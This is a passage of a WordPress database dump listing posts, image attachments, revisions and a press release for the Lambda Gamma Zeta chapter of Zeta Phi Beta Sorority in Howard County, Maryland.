Tickets','','publish','closed','closed','','denim-pearls-tickets','','','2016-12-02 16:14:19','2016-12-02 16:14:19','',0,'https://zphiblgz.org/?post_type=product&#038;p=531',0,'product','',0),(567,1,'2016-12-03 00:59:28','2016-12-03 00:59:28','','Main Slider','','publish','closed','closed','','567','','','2020-07-07 11:35:04','2020-07-07 16:35:04','',0,'https://zphiblgz.org/?post_type=ts_slider&#038;p=567',0,'ts_slider','',0),(579,1,'2016-12-04 02:30:30','2016-12-04 02:30:30','','zphibtext','','inherit','open','closed','','zphibtext-2','','','2016-12-04 02:30:30','2016-12-04 02:30:30','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/zphibtext.gif',0,'attachment','image/gif',0),(511,1,'2016-12-02 00:07:16','2016-12-02 00:07:16','','Home','','inherit','closed','closed','','6-revision-v1','','','2016-12-02 00:07:16','2016-12-02 00:07:16','',6,'https://zphiblgz.org/?p=511',0,'revision','',0),(475,1,'2016-11-29 17:03:17','2016-11-29 17:03:17','','Homepage','','inherit','closed','closed','','6-revision-v1','','','2016-11-29 17:03:17','2016-11-29 17:03:17','',6,'https://zphiblgz.org/?p=475',0,'revision','',0),(512,1,'2016-12-02 00:07:47','2016-12-02 00:07:47','','History','','inherit','closed','closed','','190-revision-v1','','','2016-12-02 00:07:47','2016-12-02 00:07:47','',190,'https://zphiblgz.org/?p=512',0,'revision','',0),(476,1,'2016-11-29 17:04:15','2016-11-29 17:04:15','','Our mission','','inherit','closed','closed','','190-revision-v1','','','2016-11-29 17:04:15','2016-11-29 17:04:15','',190,'https://zphiblgz.org/?p=476',0,'revision','',0),(513,1,'2016-12-02 00:08:06','2016-12-02 00:08:06','','Programs','','inherit','closed','closed','','247-revision-v1','','','2016-12-02 00:08:06','2016-12-02 00:08:06','',247,'https://zphiblgz.org/?p=513',0,'revision','',0),(477,1,'2016-11-29 17:05:46','2016-11-29 17:05:46','','Our ministries','','inherit','closed','closed','','247-revision-v1','','','2016-11-29 17:05:46','2016-11-29 17:05:46','',247,'https://zphiblgz.org/?p=477',0,'revision','',0),(480,1,'2016-11-29 17:35:11','2016-11-29 17:35:11','','zphibtext','','inherit','open','closed','','zphibtext','','','2016-11-29 17:35:11','2016-11-29 17:35:11','',0,'https://zphiblgz.org/wp-content/uploads/2016/11/zphibtext-1.gif',0,'attachment','image/gif',0),(481,1,'2016-12-30 07:19:13','2016-12-30 07:19:13','','W. Ruth Conway Scholarship Fund','','inherit','closed','closed','','59-autosave-v1','','','2016-12-30 07:19:13','2016-12-30 07:19:13','',59,'https://zphiblgz.org/?p=481',0,'revision','',0),(904,1,'2017-01-15 15:53:40','2017-01-15 20:53:40','','1FinalDP1','','inherit','open','closed','','1finaldp1','','','2017-01-15 15:53:40','2017-01-15 20:53:40','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/1FinalDP1.png',0,'attachment','image/png',0),(905,1,'2017-01-15 16:19:15','2017-01-15 21:19:15','','AmicetteFlyer','','inherit','open','closed','','amicetteflyer','','','2017-01-15 16:19:15','2017-01-15 21:19:15','',738,'https://zphiblgz.org/wp-content/uploads/2016/12/AmicetteFlyer.jpg',0,'attachment','image/jpeg',0),(908,1,'2017-01-15 18:12:08','2017-01-15 23:12:08','','Breakfast-On-The-Go','','inherit','open','closed','','breakfast-on-the-go-2','','','2017-01-15 18:12:08','2017-01-15 23:12:08','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Breakfast-On-The-Go.png',0,'attachment','image/png',0),(996,2,'2017-01-25 22:53:55','2017-01-26 03:53:55','','Angela Jefferson','','inherit','open','closed','','angela-jefferson-2','','','2017-01-25 22:53:55','2017-01-26 03:53:55','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Angela-Jefferson.jpg',0,'attachment','image/jpeg',0),(482,1,'2016-11-29 18:10:02','2016-11-29 18:10:02','Pellentesque in turpis consequat, tincidunt dolor eu, scelerisque metus. Sed rutrum odio metus, sed pulvinar metus ornare sit amet. Aenean eget nibh in dui dictum fermentum. Vivamus non mi cursus tortor iaculis condimentum id et metus. Duis eget consequat ipsum. Donec id dolor tortor. Sed ut risus sem. Praesent imperdiet convallis ex, non rhoncus dolor feugiat vel. Morbi sodales lacinia pellentesque. Donec ultrices nulla hendrerit lacus interdum lobortis. Fusce luctus ante in eros suscipit scelerisque.','W. Ruth Conway Scholarship Fund','','inherit','closed','closed','','59-revision-v1','','','2016-11-29 18:10:02','2016-11-29 18:10:02','',59,'https://zphiblgz.org/?p=482',0,'revision','',0),(491,1,'2016-11-29 21:04:08','2016-11-29 21:04:08','','appa2-page-001','','inherit','open','closed','','appa2-page-001','','','2016-11-29 21:04:08','2016-11-29 21:04:08','',0,'https://zphiblgz.org/wp-content/uploads/2016/11/APPA2-page-001.jpg',0,'attachment','image/jpeg',0),(493,1,'2018-11-30 08:40:34','2018-11-30 13:40:34','LGZ will be providing students taking the SAT exam with a quick and healthy breakfast. Research shows that students who have a healthy breakfast or snack before testing have better focus and perform better overall.\r\n\r\nBreakfast on the Go is an initiative under ZHope. For more information visit <a href=\"https://zphiblgz.org/zhope/breakfastonthego/\">https://zphiblgz.org/zhope/breakfastonthego/</a>\r\n\r\n&nbsp;','Breakfast on the Go','','draft','closed','open','','breakfast-on-the-go','','','2019-07-04 09:47:22','2019-07-04 14:47:22','',0,'https://zphiblgz.org/?post_type=event&#038;p=493',0,'event','',0),(1348,1,'2018-11-30 08:40:42','2018-11-30 13:40:42','LGZ will be providing students taking the SAT exam with a quick and healthy breakfast. Research shows that students who have a healthy breakfast or snack before testing have better focus and perform better overall.\r\n\r\nBreakfast on the Go is an initiative under ZHope. For more information visit <a href=\"https://zphiblgz.org/zhope/breakfastonthego/\">https://zphiblgz.org/zhope/breakfastonthego/</a>\r\n\r\n&nbsp;','Breakfast on the Go','','inherit','closed','closed','','493-revision-v1','','','2018-11-30 08:40:42','2018-11-30 13:40:42','',493,'https://zphiblgz.org/493-revision-v1/',0,'revision','',0),(494,1,'2016-11-29 21:36:34','2016-11-29 21:36:34','','Breakfast on the Go','','inherit','closed','closed','','493-revision-v1','','','2016-11-29 21:36:34','2016-11-29 21:36:34','',493,'https://zphiblgz.org/?p=494',0,'revision','',0),(571,1,'2016-12-03 13:43:49','2016-12-03 13:43:49','','get-engaged-2','','inherit','open','closed','','get-engaged-2','','','2016-12-03 13:43:49','2016-12-03 13:43:49','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Get-Engaged-2.png',0,'attachment','image/png',0),(768,1,'2017-01-03 11:02:36','2017-01-03 16:02:36','','lgzpressrelease','','inherit','open','closed','','lgzpressrelease-3','','','2017-01-03 11:02:36','2017-01-03 16:02:36','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf',0,'attachment','application/pdf',0),(576,1,'2016-12-04 00:23:27','2016-12-04 00:23:27','','membership','','inherit','open','closed','','membership','','','2016-12-04 00:23:27','2016-12-04 00:23:27','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Membership.png',0,'attachment','image/png',0),(577,1,'2016-12-04 01:56:26','2016-12-04 01:56:26','','o-graduation-facebook','Graduates walking towards future','inherit','open','closed','','o-graduation-facebook','','','2016-12-04 01:56:26','2016-12-04 01:56:26','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/o-GRADUATION-facebook.jpg',0,'attachment','image/jpeg',0),(580,1,'2016-12-04 02:41:42','2016-12-04 02:41:42','','zetaphibeta_dove_blue','','inherit','open','closed','','zetaphibeta_dove_blue','','','2016-12-04 02:41:42','2016-12-04 02:41:42','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/zetaphibeta_dove_blue.png',0,'attachment','image/png',0),(581,1,'2016-12-04 02:42:53','2016-12-04 02:42:53','','zetaphibeta_dove_blue','','inherit','open','closed','','zetaphibeta_dove_blue-2','','','2016-12-04 02:42:53','2016-12-04 02:42:53','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/zetaphibeta_dove_blue-1.png',0,'attachment','image/png',0),(665,1,'2016-12-13 19:52:50','2016-12-13 19:52:50','','lillet-williams','','inherit','open','closed','','lillet-williams-2','','','2016-12-13 19:52:50','2016-12-13 19:52:50','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Lillet-Williams.jpg',0,'attachment','image/jpeg',0),(583,1,'2016-12-04 04:52:42','2016-12-04 04:52:42','Donec eu semper leo. Vivamus convallis nunc eget velit eleifend tristique. Nulla facilisi. Sed tempor porta urna eu iaculis. Aliquam ultricies a nisl aliquet varius. In ornare risus vehicula arcu lacinia, eget finibus enim faucibus. Vestibulum fringilla quam sed nibh scelerisque, eget tincidunt ipsum fermentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Sed euismod gravida tellus, ut venenatis eros mattis ut. Fusce sollicitudin, sem vitae congue efficitur, risus dolor pretium eros, sed laoreet sem eros et mauris. Donec sed interdum ligula.\n\nCurabitur eget tortor porta, euismod odio et, mattis ex. Aenean ut nisl quis dui sollicitudin luctus in quis eros. Aliquam rutrum tellus in porta tempus. Suspendisse porttitor erat at justo gravida hendrerit. Duis a elit sit amet ipsum condimentum condimentum eu quis leo. Ut eget lectus at turpis euismod consequat eget sit amet neque. Proin suscipit vestibulum erat vel dapibus. Sed et molestie leo, quis hendrerit ante.\n\nCurabitur tristique nisl id sem lobortis pulvinar. Maecenas egestas auctor massa, non pretium ipsum tristique id. Etiam volutpat ipsum eget tristique efficitur. Praesent sit amet elit velit. Sed tristique neque quis velit egestas accumsan. Morbi laoreet tortor elit, eu finibus dui varius quis. Integer purus ipsum, scelerisque a bibendum id, placerat at tortor. Pellentesque erat enim, viverra eget interdum luctus, laoreet nec odio. Sed laoreet id libero nec euismod. Praesent tempus risus justo, nec condimentum tortor rhoncus et.','Bring water to children','','inherit','closed','closed','','90-revision-v1','','','2016-12-04 04:52:42','2016-12-04 04:52:42','',90,'https://zphiblgz.org/2016/12/04/90-revision-v1/',0,'revision','',0),(595,1,'2016-12-04 05:19:09','2016-12-04 05:19:09','','servinghc','','inherit','open','closed','','servinghc','','','2016-12-04 05:19:09','2016-12-04 05:19:09','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/ServingHC.png',0,'attachment','image/png',0),(598,1,'2016-12-04 05:38:22','2016-12-04 05:38:22','','c82-black-girls-code-2349465','','inherit','open','closed','','c82-black-girls-code-2349465','','','2016-12-04 05:38:22','2016-12-04 05:38:22','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/c82-black-girls-code-2349465.jpg',0,'attachment','image/jpeg',0),(599,1,'2016-12-04 05:58:52','2016-12-04 05:58:52','','12193870_899448590090488_441039363732937755_n','','inherit','open','closed','','12193870_899448590090488_441039363732937755_n','','','2016-12-04 05:58:52','2016-12-04 05:58:52','',493,'https://zphiblgz.org/wp-content/uploads/2016/11/12193870_899448590090488_441039363732937755_n.jpg',0,'attachment','image/jpeg',0),(600,1,'2016-12-04 06:08:49','2016-12-04 06:08:49','','12814451_955542877814392_5354322594136598871_n','','inherit','open','closed','','12814451_955542877814392_5354322594136598871_n','','','2016-12-04 06:08:49','2016-12-04 06:08:49','',0,'https://zphiblgz.org/wp-content/uploads/2016/11/12814451_955542877814392_5354322594136598871_n.jpg',0,'attachment','image/jpeg',0),(853,1,'2017-01-11 20:25:06','2017-01-12 01:25:06','','DP','','inherit','open','closed','','dp','','','2017-01-11 20:25:06','2017-01-12 01:25:06','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/DP.jpg',0,'attachment','image/jpeg',0),(852,1,'2017-01-11 20:17:20','2017-01-12 01:17:20','','Elderly','','inherit','open','closed','','elderly','','','2017-01-11 20:17:20','2017-01-12 01:17:20','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Elderly.jpg',0,'attachment','image/jpeg',0),(1438,1,'2021-01-26 10:07:19','2021-01-26 15:07:19','','140211258_3662888647079788_6327641844132942069_n','','inherit','closed','closed','','140211258_3662888647079788_6327641844132942069_n','','','2021-01-26 10:07:19','2021-01-26 15:07:19','',1431,'https://zphiblgz.org/wp-content/uploads/2021/01/140211258_3662888647079788_6327641844132942069_n-1.jpg',0,'attachment','image/jpeg',0),(803,1,'2017-01-03 14:57:47','2017-01-03 19:57:47','','rsz_marylandlogo','','inherit','open','closed','','rsz_marylandlogo','','','2017-01-03 14:57:47','2017-01-03 19:57:47','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/rsz_marylandlogo.jpg',0,'attachment','image/jpeg',0),(802,1,'2017-01-03 14:56:21','2017-01-03 19:56:21','','rsz_dove','','inherit','open','closed','','rsz_dove','','','2017-01-03 14:56:21','2017-01-03 19:56:21','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/rsz_dove.png',0,'attachment','image/png',0),(663,1,'2016-12-06 23:25:47','2016-12-06 23:25:47','[email_verification]','Email Verification','','publish','closed','closed','','email-verification','','','2016-12-06 23:25:47','2016-12-06 23:25:47','',0,'https://zphiblgz.org/2016/12/06/email-verification/',0,'fmemailverification','',0),(667,1,'2016-12-13 19:56:02','2016-12-13 19:56:02','','kalawode-150x150','','inherit','open','closed','','kalawode-150x150','','','2016-12-13 19:56:02','2016-12-13 19:56:02','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/KAlawode-150x150.jpeg',0,'attachment','image/jpeg',0),(669,1,'2016-12-13 20:07:30','2016-12-13 20:07:30','','Members (1)','','publish','closed','closed','','members-1','','','2016-12-13 20:13:23','2016-12-13 20:13:23','',0,'https://zphiblgz.org/?post_type=hover_effect&#038;p=669',0,'hover_effect','',0),(672,1,'2016-12-13 22:58:09','2016-12-13 22:58:09','','Executive Board','','publish','closed','closed','','executive-board','','','2016-12-30 05:54:17','2016-12-30 05:54:17','',0,'https://zphiblgz.org/?post_type=ich_cpt&#038;p=672',0,'ich_cpt','',0),(673,1,'2016-12-13 23:10:48','2016-12-13 23:10:48','','Chapter Members','','publish','closed','closed','','chapter-members','','','2016-12-13 23:10:48','2016-12-13 23:10:48','',0,'https://zphiblgz.org/?post_type=ich_cpt&#038;p=673',0,'ich_cpt','',0),(674,1,'2016-12-14 18:30:30','2016-12-14 18:30:30','','proclamation','','inherit','open','closed','','proclamation','','','2016-12-14 18:30:30','2016-12-14 18:30:30','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Proclamation.jpg',0,'attachment','image/jpeg',0),(675,1,'2016-12-14 18:30:35','2016-12-14 18:30:35','','proclamation2','','inherit','open','closed','','proclamation2','','','2016-12-14 18:30:35','2016-12-14 18:30:35','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Proclamation2.jpg',0,'attachment','image/jpeg',0),(676,1,'2016-12-14 18:30:40','2016-12-14 18:30:40','','proclamatioin3','','inherit','open','closed','','proclamatioin3','','','2016-12-14 18:30:40','2016-12-14 18:30:40','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Proclamatioin3.jpg',0,'attachment','image/jpeg',0),(677,1,'2016-12-14 18:31:42','2016-12-14 18:31:42','','grouppic','','inherit','open','closed','','grouppic','','','2016-12-14 18:31:42','2016-12-14 18:31:42','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/GroupPic.jpg',0,'attachment','image/jpeg',0),(678,1,'2016-12-14 18:46:45','2016-12-14 18:46:45','','finalchericeweb','','inherit','open','closed','','finalchericeweb','','','2016-12-14 18:46:45','2016-12-14 18:46:45','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/FinalChericeWeb.png',0,'attachment','image/png',0),(681,1,'2016-12-14 18:55:57','2016-12-14 18:55:57','','lgzpressrelease','','inherit','open','closed','','lgzpressrelease','','','2016-12-14 18:55:57','2016-12-14 18:55:57','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/LGZPressRelease.pdf',0,'attachment','application/pdf',0),(682,1,'2016-12-14 19:01:42','2016-12-14 19:01:42','','lgzpressrelease','','inherit','open','closed','','lgzpressrelease-2','','','2016-12-14 19:01:42','2016-12-14 19:01:42','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.png',0,'attachment','image/png',0),(689,1,'2016-12-14 19:20:12','2016-12-14 19:20:12','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#FFFFFF\" ][/button]\r\n<p style=\"text-align: center;\"></p>\r\n&nbsp;','Zeta Phi Beta Sorority Inc. Serves Howard County for 35 Years','','publish','closed','open','','zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years','','','2017-01-16 04:57:23','2017-01-16 09:57:23','',0,'https://zphiblgz.org/?post_type=sermon&#038;p=689',0,'sermon','',0),(690,1,'2016-12-14 19:20:12','2016-12-14 19:20:12','','ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS','','inherit','closed','closed','','689-revision-v1','','','2016-12-14 19:20:12','2016-12-14 19:20:12','',689,'https://zphiblgz.org/2016/12/14/689-revision-v1/',0,'revision','',0),(691,1,'2017-01-16 04:57:11','2017-01-16 09:57:11','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\n<strong><em> </em></strong>\n\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\n\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\n\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\n\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\n\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\n\n&nbsp;\n<p style=\"text-align: center;\"></p>\n&nbsp;','Zeta Phi Beta Sorority Inc. Serves Howard County for 35 Years','','inherit','closed','closed','','689-autosave-v1','','','2017-01-16 04:57:11','2017-01-16 09:57:11','',689,'https://zphiblgz.org/2016/12/14/689-autosave-v1/',0,'revision','',0),(692,1,'2016-12-14 19:24:37','2016-12-14 19:24:37','','finallgz35logo','','inherit','open','closed','','finallgz35logo','','','2016-12-14 19:24:37','2016-12-14 19:24:37','',689,'https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png',0,'attachment','image/png',0),(693,1,'2016-12-14 19:25:46','2016-12-14 19:25:46','FOR IMMEDIATE RELEASE\r\n\r\nDATE: November 10, 2016\r\n\r\nCONTACT: Crystal Whitaker <a href=\"mailto:pr@zphiblgz.org\">pr@zphiblgz.org</a>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong>\r\n\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">###</p>','Zeta Phi Beta Sorority Inc. Serves Howard County for 35 Years','','inherit','closed','closed','','689-revision-v1','','','2016-12-14 19:25:46','2016-12-14 19:25:46','',689,'https://zphiblgz.org/2016/12/14/689-revision-v1/',0,'revision','',0),(694,1,'2016-12-17 19:57:03','2016-12-17 19:57:03','','15355599_1266335763427202_8553129621538361413_n','','inherit','open','closed','','15355599_1266335763427202_8553129621538361413_n','','','2016-12-17 19:57:03','2016-12-17 19:57:03','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/15355599_1266335763427202_8553129621538361413_n.jpg',0,'attachment','image/jpeg',0),(695,1,'2016-12-17 21:40:49','2016-12-17 21:40:49','','th-5','','inherit','open','closed','','th-5','','','2016-12-17 21:40:49','2016-12-17 21:40:49','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-5.jpg',0,'attachment','image/jpeg',0),(696,1,'2016-12-17 21:40:53','2016-12-17 21:40:53','','th-4','','inherit','open','closed','','th-4','','','2016-12-17 21:40:53','2016-12-17 21:40:53','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-4.jpg',0,'attachment','image/jpeg',0),(697,1,'2016-12-17 21:40:58','2016-12-17 21:40:58','','th-3','','inherit','open','closed','','th-3','','','2016-12-17 21:40:58','2016-12-17 21:40:58','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-3.jpg',0,'attachment','image/jpeg',0),(698,1,'2016-12-17 21:41:03','2016-12-17 21:41:03','','th-2','','inherit','open','closed','','th-2','','','2016-12-17 21:41:03','2016-12-17 21:41:03','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-2.jpg',0,'attachment','image/jpeg',0),(699,1,'2016-12-17 21:41:13','2016-12-17 21:41:13','','howard-county-public-schools-squarelogo','','inherit','open','closed','','howard-county-public-schools-squarelogo','','','2016-12-17 21:41:13','2016-12-17 21:41:13','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/howard-county-public-schools-squarelogo.png',0,'attachment','image/png',0),(700,1,'2016-12-18 01:24:12','2016-12-18 01:24:12','','howard-county-public-schools','','inherit','open','closed','','howard-county-public-schools','','','2016-12-18 01:24:12','2016-12-18 01:24:12','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/Howard-County-Public-Schools.jpg',0,'attachment','image/jpeg',0),(701,1,'2016-12-18 01:46:38','2016-12-18 01:46:38','','c22ed1_fce06e018b8341988035fed2cc2f7251','','inherit','open','closed','','c22ed1_fce06e018b8341988035fed2cc2f7251','','','2016-12-18 01:46:38','2016-12-18 01:46:38','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/c22ed1_fce06e018b8341988035fed2cc2f7251.png',0,'attachment','image/png',0),(702,1,'2016-12-18 01:47:45','2016-12-18 01:47:45','','imgres','','inherit','open','closed','','imgres','','','2016-12-18 01:47:45','2016-12-18 01:47:45','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/imgres.png',0,'attachment','image/png',0),(703,1,'2016-12-18 01:49:30','2016-12-18 01:49:30','','th-6','','inherit','open','closed','','th-6','','','2016-12-18 01:49:30','2016-12-18 01:49:30','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-6.jpg',0,'attachment','image/jpeg',0),(704,1,'2016-12-18 01:50:02','2016-12-18 01:50:02','','th-7','','inherit','open','closed','','th-7','','','2016-12-18 01:50:02','2016-12-18 01:50:02','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/th-7.jpg',0,'attachment','image/jpeg',0),(705,1,'2016-12-18 01:52:01','2016-12-18 01:52:01','','imgres-1','','inherit','open','closed','','imgres-1','','','2016-12-18 01:52:01','2016-12-18 01:52:01','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/imgres-1.png',0,'attachment','image/png',0),(706,2,'2016-12-21 02:51:16','2016-12-21 02:51:16','','tamikadaniel','','inherit','open','closed','','tamikadaniel','','','2016-12-21 02:51:16','2016-12-21 02:51:16','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/TamikaDaniel.jpg',0,'attachment','image/jpeg',0),(707,2,'2016-12-21 02:51:34','2016-12-21 02:51:34','','christy-lewis','','inherit','open','closed','','christy-lewis','','','2016-12-21 02:51:34','2016-12-21 02:51:34','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Christy-Lewis.jpg',0,'attachment','image/jpeg',0),(708,2,'2016-12-21 02:51:51','2016-12-21 02:51:51','','barbaragreene','','inherit','open','closed','','barbaragreene','','','2016-12-21 02:51:51','2016-12-21 02:51:51','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/BarbaraGreene.jpg',0,'attachment','image/jpeg',0),(709,2,'2016-12-21 02:52:04','2016-12-21 02:52:04','','ava1-700x933','','inherit','open','closed','','ava1-700x933','','','2016-12-21 02:52:04','2016-12-21 02:52:04','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Ava1-700x933.jpg',0,'attachment','image/jpeg',0),(710,2,'2016-12-21 02:52:16','2016-12-21 02:52:16','','cassie-700x791','','inherit','open','closed','','cassie-700x791','','','2016-12-21 02:52:16','2016-12-21 02:52:16','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Cassie-700x791.jpg',0,'attachment','image/jpeg',0),(711,2,'2016-12-21 02:52:33','2016-12-21 02:52:33','','chericedaniel-in-white','','inherit','open','closed','','chericedaniel-in-white','','','2016-12-21 02:52:33','2016-12-21 